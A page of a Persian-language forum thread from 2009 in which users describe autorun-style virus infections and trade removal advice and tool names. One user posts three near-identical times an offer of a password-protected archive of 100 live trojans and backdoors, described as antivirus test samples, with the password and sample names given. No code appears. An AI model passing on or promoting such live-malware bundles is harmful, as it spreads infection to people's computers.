PDA

نسخه کامل مشاهده نسخه کامل : روشهای حل مشکل Show Hidden Files و از بین بردن انواع ویروسهای کامپیوتری ( فهرست مطالب در پست اول)
















    

صفحه ها : 1 2 3 4 5 [6] 7 8 9 10

zeus7610
09-03-2009, 18:20
سلام. من جدیدا یک ویروس رو دیدم که خیلی خفنه.. اولین مشکلی که ایجاد می کنه اینه که توی شبکه دسترسی به سیستم شما رو توی workgroup برای بقیه سیستمها غیرممکن می کنه. فایروال روخاموش و روشن میکنه. اکثر تغییرات سیستمی با یک ریست دوباره مثل اول میشه. شبکه به شدت کند میشه و دیگه سیستم در حالت هنگ میره. توی system voloume information هم که معمولا جای ویروسهاست چند تا فایل داره که رنگ نوشته های فولدر رو آبی می کنه (قبلا هم ویروس اینجوری دیده بودم) با نود وژن 4 آپدیت هم حذف نمیشه. Recycled هم میسازه و یه سری از کارهای ویروس autoply.exe رو هم انجام میده. یه فایل bat درست می کنه که اسمش یادم نیست و توی همه روت درایوها کپی می کنه. کمککککک

Gpb
10-03-2009, 13:33
آفرین عالی کمک کردی
مطالبت حرف نداشت

egoldfars
10-03-2009, 22:24
بله ویروسه و باید ابتدا فایلهای اصلیش رو پاک کنید.
با نود آپدیت سیستم رو چک کنید.
avast روی سیستم وصل هست با اون میشه .راستی فایل اصلی رو از کجا پیدا کنم و چه جوری.

SuB
10-03-2009, 23:11
سلام. من جدیدا یک ویروس رو دیدم که خیلی خفنه.. اولین مشکلی که ایجاد می کنه اینه که توی شبکه دسترسی به سیستم شما رو توی workgroup برای بقیه سیستمها غیرممکن می کنه. فایروال روخاموش و روشن میکنه. اکثر تغییرات سیستمی با یک ریست دوباره مثل اول میشه. شبکه به شدت کند میشه و دیگه سیستم در حالت هنگ میره. توی system voloume information هم که معمولا جای ویروسهاست چند تا فایل داره که رنگ نوشته های فولدر رو آبی می کنه (قبلا هم ویروس اینجوری دیده بودم) با نود وژن 4 آپدیت هم حذف نمیشه. Recycled هم میسازه و یه سری از کارهای ویروس autoply.exe رو هم انجام میده. یه فایل bat درست می کنه که اسمش یادم نیست و توی همه روت درایوها کپی می کنه. در ضمن یه کار خفن دیگش اینه که فایل explorer.exe رو بر می داره یه جوریش می کنه که data execution prevention دیگه اجازه اجرا شدن بهش نمیده و بلوک می کنه. یعنی ویندوز می پره. فقط بک گراند یاد بالا و explorer اجرا نمی شه. بعد هم بعضی وقتها میزنه فایلهای بوت مثل ntldr , boot.ini رو پاک میکنه و دیگه ویندوز تعطیل. کسی می تونه کمکی به من بکنه ؟

ببینید دوست عزیز بیشتر ویروسها برای به صورت یک پروسه یا سرنخ در حال اجرا هستند. با خارج کردن این پروسه یا سرنخ، ویروس از رم خارج میشه. در این صورت شما تنها باید به جلوگیری از اجرای دوباره ویروس در هنگام راه‌اندازی مجدد کامپیوتر بکنید.

ویروسهای خفن ،task manager شما را یا غیرفعال می‌کنند یا پاک می‌کنند یا با فایلهای آلوده خودشون جایگزین می‌کنند. معمولاً این ویروسها دارای پروسه مخفی هستند که task manager قادر به نمایش آنها نیست. تنها راه استفاده از برنامه‌های مدیریت سرنخ هست. مثل Advanced Process Terminator که رایگان هست و می‌تونین از سایتش دانلود کنین.

البته برخی ویروسها به نام این برنامه حساس هستند و بهتره فایل اجرایی اونها رو به یه نام بی ربط مثل 321 تغییر بدین. البته ممکنه هیچ یک از این روشها کارساز نباشه.:31:

picher_s
11-03-2009, 07:56
سلام
پس Rootkit unhooker رو دون کن بعد عکس از پروسز های فعالش بزار.
بعد به قسمت Report برو و از تمام رایوات بگو برات گزاش بگیره.
پولدار باشی.:31:

alyy
11-03-2009, 13:05
با سلام خدمت اساتید!!!
خوب برای بار اول این مشکل برای من به وجود امد و نمیدونم ویروس هست یا یک قضیه دیگه!!من این فلش دوستم را چپوندم توی usb و مشکل از اونجا شروع شد!!این show hidden من نابود شده و نمیدونم چرا نیست!!وقتی روی تولز کلیک میکنم دیگه show hidden ندارم و فولدر اپشن اینا نیست شده و به جاش 3 تا گزینه میاد!!
یکی map network drive هست در اول
بعد discconect network drive
و بعد synchorize هست!!
البته من ویروسی به نام autorun.inf ندیدم!!سوالی که دارم اینه ایا این ویروس هست!!البته طبق پست اول این تاپیک من وقتی روی run کلیک میکنم و regedit را میزنم پیغام regestry editing has been disabled by your administrator میده و البته دوست عزیزمون راه حل هایی داده بودند ولی متاسفانه بنده فولدر اپشنی ندارم!!
در روش اول گفتن بتدا فلش مموری را به کامپیوتر وصل کنید اما اون فلش مموری دست من نیست!!
در راهنمایی هم گفتن گر folder options شما وجود ندارد و ممکن است پاک شده باشد در زیر برنامه هایی برای برگرداندن ان معرفی کرده ام
اما در زیر برنامه من متوجه نشدم چه زیر برنامه ای!!
در روش دوم گفتن start->run->cmd.exe برای من اینو نمیاد!!
حالا شما یک راهنمایی من را بکنید ببینم چی خاکی تو سرم بریزم!!!
مرسی!!
اين ويروسه اتوران خيلي راحت تر از اوني كه من فكرشو ميكردم پاك ميشه البته به اضافه ي تعويض ويندوز مال من كه مشكلش واسه هميشه با اتوران حل شد تازه وقتي يه وسيله به سيستمم نصب ميكنم كه اتوران داشته باشه خيلي راحت پاكش ميكنم بدون اينكه ويروسي بشه و يه روش خيلي ساده هم هست اگه نتونستيد از شر اتوران راحت بشيد بگيد تا راهنمايي تون كنم:11:

SAYE1359
12-03-2009, 13:27
سلام
سیستم من نمیدونم چه ویروسی گرفته که بیشتر فایلهای تصویری وصوتی و عکسام حذف شده و فقط یه فولدر خالی مونده حدود 50 گیگ از این نوع فایلها از کامپیوترم خود به خود حذف شده چه ویروسی میتونه باشه من آنتی ویروس avira دارم که آپدیته ولی هیچ کمکی بهم نمی کنه

خواهش می کنم کمکم کنین

moas_as
12-03-2009, 23:17
سلام ممنون بابت راهنمایی من از اون مطلب که در مورد فایل های مخفی بود استفاده کردم مفید بود

gard&khak hak
13-03-2009, 11:39
به نام خداوند علم و دانش
با سلام به دوستان من یه سیستم دارم که آنتی ویروس نداره و پر ویروس شده لیست ویروس ها هم در زیر است لطفا کمک کنید تا از شر این ویروس های چی بگم خلاص بشم
در درایو C
AUTOEXEC.BAT
autoply.exe
autorun.inf
boot.ini
CONFIG.SYS
hgu.bat
IO.SYS
MSDOS.SYS
NTDETECT.COM
ntldr
در دیگر درایو ها هم این ها تکرار می شن
autoply.exe
autorun.inf
hgu.bat
اکثر جاهای کامپیوتر هم این فایل رو می بینم به صورت واضح نه هایدن
Thumbs.db
پیشا پیش از تمام دوستان تشکر می کنم .


---------------------------------------------------------------
به رنگ آسمون به رنگ دریا به رنگ تموم رنگای دنیا دوست دارم قد تموم دنیا

picher_s
13-03-2009, 20:00
در درایو C
AUTOEXEC.BAT
boot.ini
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
ntldr
اکثر جاهای کامپیوتر هم این فایل رو می بینم به صورت واضح نه هایدن
Thumbs.db
پیشا پیش از تمام دوستان تشکر می کنم .

اینا ویروس نیستن!!!



autoply.exe
autorun.inf
hgu.bat

اینا هستن! که به آنتی به روز راحت پاک میشن!برو به بخش آنتی ها یه آنتی دون کن.بعدم یه regrepair بزن.
موفق باشید.

rahgozare tanha
13-03-2009, 22:31
سلام من با ایمن تحت داس کامپیوترم رو چک کردم دو تا ویروس jeefo که البته نوشته بد افزار هست و mila پیدا کرده برای jeefo از پست اول همین تایپیک آنتی ویروس پیدا کردم ولی mila رو چیکار کنم ? اولی تو فایلهای 98 دومی هم تو xp هست .چیکار باید بکنم ؟می شه بگین این ویروسها از چه طریقی وارد کامپیوتر می شن ؟ مرسی

naseronline
13-03-2009, 23:31
قابلیت های M30 Autoran Remover :
- پاکسازی کامل سیستم از ویروس اتوران به صورت کامل و سریع
- عدم احتیاج به نصب برنامه (Portable)
- حجم بسیار پایین نرم افزار (تنها ? مگابایت)
- سریع ترین و کوچک ترین نرم افزار آنتی ویروس
- استفاده آسان
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

منبع :
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

je_es
14-03-2009, 17:27
سیستم من ویروس WIN 32/HEUR و ویروس TANATOS.M گرفته با ویروس کش AVGشناسائی کرده ولی قابلیت ÷اک کردن را ندارد اگر کسی اطلاعاتی دارد ایمیل کند je_es2006@yahoo.com باز هم از شما دوستان و مدیر محترم سایر کمال تشکر را دارم.

mehjam
14-03-2009, 21:10
من سیستمم amvo داشت، با کمک برنامه هایی که دوستان گفتند و همچنین خط فرمان Eset تونستم ظاهرا پاکش کنم.(ecls)
پس از این بابت ممنون.
ولی یه مشکل و شاید دو مشکل باقی مونده:
1- وقتی آنتی ویروس Eset رو نصب میکنم دقیقا در آخرین مرحله Rool Back میکنه و نصب نمیشه.
2- وقتی به اینترنت وصل میشم پس از Connect شدن بلافاصله دیسکانکت میکنه.

ممنون میشم دوباره کمکم کنید.

SajjadKAZ2003
16-03-2009, 15:12
مشکل من اینه :
به محض اینکه فلش دیسک رو به کامپیوتر متصل می کنم یه فایل به اسم autorun.inf و یه فولدر به اسم RECYCLER که درونش فایل jwgkvsq.vmx هست تولید میشه

تو هاردم مشکلی از این بابت ندارم فقط به محض اینکه فلش دیسک رو وصل می کنم این فایلها در فلش دیسک تولید میشه

این ویروس در ویندوز طوری مخفی میشه که خیلی از آنتی ویروسها اون رو نمیشناسن و کارش اینه که به محض وصل کردن فلش دیسک این فایلها رو در فلش دیسک ایجاد میکنه

دنبال راه چاره برای از بین بردن این ویروس هستم

Ghaioom
16-03-2009, 15:43
مشکل من اینه :
به محض اینکه فلش دیسک رو به کامپیوتر متصل می کنم یه فایل به اسم autorun.inf و یه فولدر به اسم RECYCLER که درونش فایل jwgkvsq.vmx هست تولید میشه

تو هاردم مشکلی از این بابت ندارم فقط به محض اینکه فلش دیسک رو وصل می کنم این فایلها در فلش دیسک تولید میشه

این ویروس در ویندوز طوری مخفی میشه که خیلی از آنتی ویروسها اون رو نمیشناسن و کارش اینه که به محض وصل کردن فلش دیسک این فایلها رو در فلش دیسک ایجاد میکنه

دنبال راه چاره برای از بین بردن این ویروس هستم
شما از برنامه ی Autorun Virus Remover استفاده کنید ببینید چی میشه.

AABB
17-03-2009, 05:08
سلام به همگی دوستان.
می خواستم معلومات جامعی در رابطه win32.TrojanClick.Spywad.b بدست بیارم. در اینترنت سرچ زدم ولی چیز جالبی دستگیرم نشد.
تشکر :40:

majid_barca
18-03-2009, 11:00
این ویروسی که باعث عدم نمایش فایل های مخفی میشه و باعث میشه درایوها تو یه پنجره دیگه باز بشن رو چطور میشه پاک کرد؟

Rashki
18-03-2009, 11:46
مهدی عزیز از مطالب بسیار ارزشمندت سپاسگذار و ممنون
کمک خیلی بزرگی به من کردی و البته فکر کنم به خیلی ها مثل من .
موفق باشی و سال نو مبارک

omid-p30
18-03-2009, 11:56
این ویروسی که باعث عدم نمایش فایل های مخفی میشه و باعث میشه درایوها تو یه پنجره دیگه باز بشن رو چطور میشه پاک کرد؟


باز شدن درایوها با دابل کلیک در یک پنجره جدید یا باز شدن پنجره search

راههاي دستي براي از بين بردن ویروسی که Show Hidden Files را غیر فعال می کند .

هر دو در پست اول

arash_misaghi
18-03-2009, 20:25
سلام علیکم اقا ما یه ویروسی گرفتیم که نمیزاره انتی ویروس نصب بشه و سیستم که روشن میکنم بعد از چند بار ریسیت و خاموش روشن شدن میاد بالا و بعضی از سخت افزارها رو حذف میکنه و نمیذاره که کارمونو انجام بدیم
اگه میشه یه راهی به ما نشون بدید

rastin2
19-03-2009, 10:33
سلام به همگي
سيستم من يه ويروسي گرفته كه درايوها را نميتوان بازكرد به اين صورت كه وقتي ميخواهي درايو را باز كني يه لحظه صفحه ناپديد ميشودو دوباره به همان حالت قبلي برميگردد . ممنون ميشم كمك كنيد.

SuB
19-03-2009, 13:10
سلام به همگي
سيستم من يه ويروسي گرفته كه درايوها را نميتوان بازكرد به اين صورت كه وقتي ميخواهي درايو را باز كني يه لحظه صفحه ناپديد ميشودو دوباره به همان حالت قبلي برميگردد . ممنون ميشم كمك كنيد.

وقتی می‌خواین که منو start رو کنین، برای دفعه اول منو باز میشه و فوراً بسته میشه و از اون بعد دیگه نمی‌تونین منوی start رو باز کنین?

کلاً مشخص هست که چرا با کلیک بر روی درایوهاتون این مشکل پیش میاد. ویروسش از سری ویروسهایی هست که توی درایوهاتون یه فایل به نام autorun.inf ایجاد میکنه که این فایل خودش اشاره به ویروس داره و با دابل کلیک شما بر روی هر درایو، ویروس اجرا میشه (هر چند که احتمالاً اجرا هست)

برای باز کردن هر درایوی به غیر از سی‌دی رام و دی‌وی‌دی رام، از دابل کلیک استفاده نکنین. بلکه با تایپ آدرسش در Address Bar اون رو باز کنین. برای مثال برای باز کردن درایو C اون بالا تایپ کنین :C و کلید enter رو بزنین.

اما برای ویروس کشی باید مشخص بشه که پروسه ویروس در حال اجرا هست یا نه. اگه پروسه ویروس در حال اجرا باشه که باید اول پروسه اون رو به هر شکلی از حافظه خارج کنین و سپس به پاک کردن ویروس بپردازین و اگه پروسش در حال اجرا نباشه، که ویروس کشی خیلی ساده هست. (معمولاً ویروسها خودشون رو در Start Up قرار می‌دهند یا اینکه در رجیستری خودشون رو به عنوان فایل Start up معرفی می‌کنند. که باید از اجرای اونها در هنگام اجرای محدد ویندوز جلوگیری کرد. اگه msconfig فعال باشه و ویروسی نباشه می‌تونین ازش برای این کار استفاده کنین):31:

rastin2
24-03-2009, 10:46
با سلام
اين روشها را قبلا امتحان كردم ولي هيچ جوابي نداد.به غير از درايو ويندوز درايوهاي ديگر را نميتوان باز كرد .ممنون ميشم از راهنمايي شما عزيزان

sayan_se666
24-03-2009, 11:59
من بشتر مواقع كه به اينترنت وصل مي شوم فايلهاي exe با نام هاي مختلف مثلbiz يا niz وغيره وارد درايو c ميشود و باعث اختلال در سيستم مي شود

picher_s
24-03-2009, 12:10
سلام علیکم اقا ما یه ویروسی گرفتیم که نمیزاره انتی ویروس نصب بشه و سیستم که روشن میکنم بعد از چند بار ریسیت و خاموش روشن شدن میاد بالا و بعضی از سخت افزارها رو حذف میکنه و نمیذاره که کارمونو انجام بدیم
اگه میشه یه راهی به ما نشون بدید
ُلام
مسیر زیر در پست 1 یک را حل وجود داره.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اونو انجام بدید.
اگر موفق به حذف ویروس نشد سپس RootKit unhooker رو دون کنید و از پروسز های فعالتون عکس بگیرید و همچنین از قسمته Report این برنامه.
موفق و پیروز باشید.

mr-secret
24-03-2009, 18:42
سلام دوست عزیز
من برنامه Restorator رو نصب کردم بعد از اینکه کرکش کردم هیچ فایل اجرایی باز نمیشه
شکل و قایله همچیش درسته فقط با دابل کلیک باز نمیشه اصلا هیچ جوری باز نمیشه
انتی ویروس نود32 به روز هم دارم رو سیستم اونم دیگه بالا نمیاد
راه جل رو میدونید بگید لطفا ویندوزم هم ویستا سرویس پگ 1 هست

jhan61
24-03-2009, 20:25
با سلام
بنده یکی از کابران جدید این سایت خوب می باشم واز مدیریت محترم سایت برای سایت خوبشون و ازآقای mahdi7610 باری ارائه مطالب سودمندشون تشکر می کنم

Fire Girl
25-03-2009, 00:41
کمممممممممممممممممممممممم ممممممممممممممممممک
کامپیوتر من یه ویروسی گرفته که علامتای ویروس اتورانو داره. یعنی هم task manager رو غیر فعال کرده و هم نمی ذاره حالت thumbnail عکسارو نشون بده یعنی کلا windows picture and fax viewer منو بی خیال شده و کلی اعصابمو ریخته به هم. داداش ما یه غلطی کرد و یه رم ریدر از دوستش آورد به کامپیوتر وصل کرد حالا هم ویندوزم دهن منو سرویس کرده. دو باری هم ویندوز عوض کردم به امید این که شاید این فایل اتورانو رویت کنم ولی همه ی فایلای هایدنم دیده می شه جز اتوران یعنی اصلا یه همچین فایلی نیست........... هر دفعه هم registary مو غیر فعال می کنه.... با همون دابل کلیک هم فعال میشه اما این دو بار بعد از نصب ویندوز زحمت ما رو کم کرده خودش بدون دابل کلیک فعال شده...... خلاصه اعصابمو ریخته به هم خواهشا کمکم کنید سیستمو بی خیال خودم دارم نابود می شم.......
خدا پدر و مادر هرکی و که بتونه به من کمک کنه بیامرزه...............

urc
27-03-2009, 14:10
از کاربران اگر کسی گرفتار هر گونه ویروس شده بگه تا راهپاک کردنش را بگذارم
urc

urc
27-03-2009, 14:26
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آنتی ویروس خود را با 100 نوع ویروس واقعی آزمایش کنید !!!
خیلی از شما تا بحال تست آنتی ویروسها را که در سایت های مختلف گذاشته شده اند دیده اید. اما هیچ اطلاعی
از اینکه این آنتی ویروسها واقعا چه نوع فایل هایی رو اسکن میکنند ندارید و یا اینکه چه نمونه هایی رو در آزمایش
آنتی ویروسها بکار بردند.

من در اینجا فایلی را قرار میدهم که با مسئولیت خودتان آن را دانلود کرده و آنتی ویروس خود را آزمایش کنید. این فایل
فشرده شده جهت اطمینان بهش پسورد داده شده تا کسی کار اشتباهی رو انجام نده. این فایل فشرده شده دارای
100 نوع از خطرناکترین و مشهورترین ویروسها و تروجانهای 1 الی 2 ماه گذشته هستند که در تمام دنیا پخش شده اند

خیلی از این ویروسها مانند Hupigon تغییر شکل میدهند و هر روز یک نوع جدید از این ویروس در اینترنت پخش میشود
متاسفانه خیلی از آنتی ویروسها حتی 50 درصد این 100 تا فایل آلوده را هم نمیتوانند تشخیص دهند. چون این ویروس
ها و تروجانها همگی از دنیای واقعی اینترنت صید شده اند پس وقتی آنتی ویروسها را با این نمونه ها تست میکنید
باید بدونید که در دنیای واقعی آنتی ویروس شما چطور عمل میکنه.

نتیجه گیری و تصمیم بر اینکه کدام آنتی ویروس خوب عمل میکنه یا بد رو به عهده خودتون میگذارم چون من این فایل
رو فقط جهت آزمایش قرار میدم و هیچ منظور و قصد دیگه ای از قرار دادن این فایل در اینجا ندارم. پس لطفا هر کسی
آنتی ویروس خودش رو با توضیحاتی که در پایین میدم تست بکنه و نتیجه اون رو در این تایپک قرار بده چون دونستن این
نتیجه ها برای خیلی ها میتونه قابل توجه باشه.

فایل فشرده شده و Rar شده زیر اسمش 100_Virus_For_Test است و پسورد اون هم 100pass. برای اینکه
امنیت بیشتری رعایت بشه یک فایل فشرده شده دیگه بصورت rar در داخل فایل فشرده شده بالا قرار داره.
یعنی 2 نوع فایل rar در داخل هم فشرده شده. برای باز کردن فایل اولی پسورد 100pass رو وارد میکنید و فایل
فشرده شده ای که از توش خارج میشه رو با آنتی ویروستون اسکن میکنید.

توجه داشته باشید که فایل فشرده شده دوم را به هیچ عنوان Extract نکنید بلکه فقط اون رو توسط آنتی
ویروستون اسکن کنید و نتیجه اون رو در اینجا قرار بدید.

پس شما طبق شیوه زیر عمل میکنید.
1. فایل را از لینکی که در زیر قرار میدم دانلود میکنید. دانلودش که تمام شد بر روی اون فایل
کلیک راست میکنید و دقیقا مثل عکس زیر عبارتی رو که در زیر نشون دادم انتخاب میکنید تا
اون فایل از حالت فشرده در بیاد.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

2.زمانی که شما گزینه Ectract to 100_Virus_For_Test را میزنید از شما پسورد میخواد و شما
هم پسورد 100pass را به آن میدهید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

3. همان طور که در عکس بالا میبینید اگر زمانی که شما پسورد را بزنید و اوکی را بزنید هیچ
اتفاقی نمی افتند فقط فایل 100pass.rar از داخل فایل فشرده اولی در میاد و در داخل یک
پوشه دیگه قرار میگیره.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

4. داخل پوشه شوید و مانند عکس زیر فقط بر روی آن کلیک راست کنید و قسمتی رو که مربوط
به اسکن آنتی ویروس شماست رو انتخاب میکنید. من در شکل زیر برای نشان دادن این
قسمت از آنتی ویروس ناد32 نسخه 2 استفاده کردم. اما شما همین گرینه ها را برای آنتی
ویروس خودتون میتونید پیدا کنید. تنها آنتی ویروسی که تازگی ها استفاده کردم و یادم میاد که
گزینه کلیک راست برای اسکن یک فایل را نداشت Trend Micro IS Pro 2008 بود. اما برای
اسکن فایل میشد که آنتی ویروس رو باز کرد و فایلی رو برای اسکن بصورت دستی در قسمت
اسکن آنتی ویروس وارد کرد.

پس شما نیز مطابق عکس زیر فقط بر روی این فایل در صورت تمایل کلیک راست کرده و اون رو
اسکن میکنید و نتیجه اون رو اگر خواستید در اینجا قرار میدید. هرگز هم سعی نکنید که فایل
دومی را که در حال اسکن هستید باز کنید و یا از حالت فشرده خارج کنید. هرگونه خرابکاری
و یا از دست دادن اطلاعات سیستمتون به دلیل رعایت نکردن و بی توجهی به توصیه های من
بر عهده خودتون هست. پس لطفا کنجکاوی زیادی به خرج ندید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

تاکید میکنم که فایل 100pass.rar رو از حالت فشرده خارج نکنید و هرگز سعی نکنید اون رو
باز کنید و بر روی فایل هایی که در د اخلش قرار داره کلیک کنید. در غیر این صورت ویروس و یا
تروجان در سیستم شما فعال شده و سیستمتون آلوده میشه.

این 100 ویروس و تروجان از خطرناکترین نوع خودشون هستند که در 100 نمونه جدا در این
فایل جمع آوری شدند و این فایل فقط و صرفا بخاطر آزمایش آنتی ویروسها با دنیای واقعی
است.

برای دانلود فایل میتونید یکی از لینک های زیر را برای دانلود انتخاب کنید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

اسم بعضی از نمونه هایی که در این فایل وجود دارند را در زیر میتونید مشاهده کنید.


MalwareScope.Backdoor.Hupigon
Packed.Win32.Klone.af
Trojan-Spy.Win32.Banker.to
Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.VB.akp
Trojan-Downloader.Win32.Banload.TN
Trojan-Downloader.Win32.Delf.TU
Trojan-Downloader.Win32.Agent.dkf
Packed.Win32.Klone.af
Backdoor.Win32.EggDrop
Virus.Win32.Agent.KWT
Trojan-PWS.Win32.Small.br
Trojan-Proxy.Win32.Horst.aae
Virus.Win32.Alhel
Virus.Win32.Trojan
Trojan-PWS.Win32.Small.br
Trojan-Spy.Win32.Delf.PG
Trojan-PWS.Win32.Small.br
Win32.SuspectCrc
Trojan.Win32.VB.sj
Backdoor.Win32.Rbot.bnn
Backdoor.Win32.Hupigon
IM-Worm.Win32.Sumom.C
Trojan-Spy.Win32.Banker.ahy
Trojan.Agent.BTL
Trojan-Downloader.Win32.Agent.eup
Trojan.Win32.VB.bji
Virus.Win32.Baidubar.B
Virus.Win32.Visel.E
Trojan-Downloader.Azm.INI
Worm.Win32.VB.ge
Trojan-Downloader.Win32.Zlob.and
Virus.Win32.Killreg.F
Backdoor.Win32.Agent.cwm
Trojan-PWS.Win32.Small.br
Virus.Win32.Baidubar.B
Trojan.Win32.Zapchast.dq
Trojan-Spy.Win32.Banker.JU
Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.PcClient.zn
Virus.Win32.Delf.GAJ
Virus.Win32.Agent.IWX
TR/Drop.Agent.bjl.4
SPR/Agent.ZA.1
TR/Spy.258081
TR/Dldr.Agent.155648.1
WORM/Sumom.C.22
SPR/PSW.TenyQQ
Win32/TrojanDownloader.Adload.NEP

urc
27-03-2009, 14:29
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آنتی ویروس خود را با 100 نوع ویروس واقعی آزمایش کنید
لینک دانلود
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

urc
27-03-2009, 14:30
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آنتی ویروس خود را با 100 نوع ویروس واقعی آزمایش کنید !!!
خیلی از شما تا بحال تست آنتی ویروسها را که در سایت های مختلف گذاشته شده اند دیده اید. اما هیچ اطلاعی
از اینکه این آنتی ویروسها واقعا چه نوع فایل هایی رو اسکن میکنند ندارید و یا اینکه چه نمونه هایی رو در آزمایش
آنتی ویروسها بکار بردند.

من در اینجا فایلی را قرار میدهم که با مسئولیت خودتان آن را دانلود کرده و آنتی ویروس خود را آزمایش کنید. این فایل
فشرده شده جهت اطمینان بهش پسورد داده شده تا کسی کار اشتباهی رو انجام نده. این فایل فشرده شده دارای
100 نوع از خطرناکترین و مشهورترین ویروسها و تروجانهای 1 الی 2 ماه گذشته هستند که در تمام دنیا پخش شده اند

خیلی از این ویروسها مانند Hupigon تغییر شکل میدهند و هر روز یک نوع جدید از این ویروس در اینترنت پخش میشود
متاسفانه خیلی از آنتی ویروسها حتی 50 درصد این 100 تا فایل آلوده را هم نمیتوانند تشخیص دهند. چون این ویروس
ها و تروجانها همگی از دنیای واقعی اینترنت صید شده اند پس وقتی آنتی ویروسها را با این نمونه ها تست میکنید
باید بدونید که در دنیای واقعی آنتی ویروس شما چطور عمل میکنه.

نتیجه گیری و تصمیم بر اینکه کدام آنتی ویروس خوب عمل میکنه یا بد رو به عهده خودتون میگذارم چون من این فایل
رو فقط جهت آزمایش قرار میدم و هیچ منظور و قصد دیگه ای از قرار دادن این فایل در اینجا ندارم. پس لطفا هر کسی
آنتی ویروس خودش رو با توضیحاتی که در پایین میدم تست بکنه و نتیجه اون رو در این تایپک قرار بده چون دونستن این
نتیجه ها برای خیلی ها میتونه قابل توجه باشه.

فایل فشرده شده و Rar شده زیر اسمش 100_Virus_For_Test است و پسورد اون هم 100pass. برای اینکه
امنیت بیشتری رعایت بشه یک فایل فشرده شده دیگه بصورت rar در داخل فایل فشرده شده بالا قرار داره.
یعنی 2 نوع فایل rar در داخل هم فشرده شده. برای باز کردن فایل اولی پسورد 100pass رو وارد میکنید و فایل
فشرده شده ای که از توش خارج میشه رو با آنتی ویروستون اسکن میکنید.

توجه داشته باشید که فایل فشرده شده دوم را به هیچ عنوان Extract نکنید بلکه فقط اون رو توسط آنتی
ویروستون اسکن کنید و نتیجه اون رو در اینجا قرار بدید.

پس شما طبق شیوه زیر عمل میکنید.
1. فایل را از لینکی که در زیر قرار میدم دانلود میکنید. دانلودش که تمام شد بر روی اون فایل
کلیک راست میکنید و دقیقا مثل عکس زیر عبارتی رو که در زیر نشون دادم انتخاب میکنید تا
اون فایل از حالت فشرده در بیاد.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

2.زمانی که شما گزینه Ectract to 100_Virus_For_Test را میزنید از شما پسورد میخواد و شما
هم پسورد 100pass را به آن میدهید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

3. همان طور که در عکس بالا میبینید اگر زمانی که شما پسورد را بزنید و اوکی را بزنید هیچ
اتفاقی نمی افتند فقط فایل 100pass.rar از داخل فایل فشرده اولی در میاد و در داخل یک
پوشه دیگه قرار میگیره.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

4. داخل پوشه شوید و مانند عکس زیر فقط بر روی آن کلیک راست کنید و قسمتی رو که مربوط
به اسکن آنتی ویروس شماست رو انتخاب میکنید. من در شکل زیر برای نشان دادن این
قسمت از آنتی ویروس ناد32 نسخه 2 استفاده کردم. اما شما همین گرینه ها را برای آنتی
ویروس خودتون میتونید پیدا کنید. تنها آنتی ویروسی که تازگی ها استفاده کردم و یادم میاد که
گزینه کلیک راست برای اسکن یک فایل را نداشت Trend Micro IS Pro 2008 بود. اما برای
اسکن فایل میشد که آنتی ویروس رو باز کرد و فایلی رو برای اسکن بصورت دستی در قسمت
اسکن آنتی ویروس وارد کرد.

پس شما نیز مطابق عکس زیر فقط بر روی این فایل در صورت تمایل کلیک راست کرده و اون رو
اسکن میکنید و نتیجه اون رو اگر خواستید در اینجا قرار میدید. هرگز هم سعی نکنید که فایل
دومی را که در حال اسکن هستید باز کنید و یا از حالت فشرده خارج کنید. هرگونه خرابکاری
و یا از دست دادن اطلاعات سیستمتون به دلیل رعایت نکردن و بی توجهی به توصیه های من
بر عهده خودتون هست. پس لطفا کنجکاوی زیادی به خرج ندید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

تاکید میکنم که فایل 100pass.rar رو از حالت فشرده خارج نکنید و هرگز سعی نکنید اون رو
باز کنید و بر روی فایل هایی که در د اخلش قرار داره کلیک کنید. در غیر این صورت ویروس و یا
تروجان در سیستم شما فعال شده و سیستمتون آلوده میشه.

این 100 ویروس و تروجان از خطرناکترین نوع خودشون هستند که در 100 نمونه جدا در این
فایل جمع آوری شدند و این فایل فقط و صرفا بخاطر آزمایش آنتی ویروسها با دنیای واقعی
است.

برای دانلود فایل میتونید یکی از لینک های زیر را برای دانلود انتخاب کنید.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

اسم بعضی از نمونه هایی که در این فایل وجود دارند را در زیر میتونید مشاهده کنید.


MalwareScope.Backdoor.Hupigon
Packed.Win32.Klone.af
Trojan-Spy.Win32.Banker.to
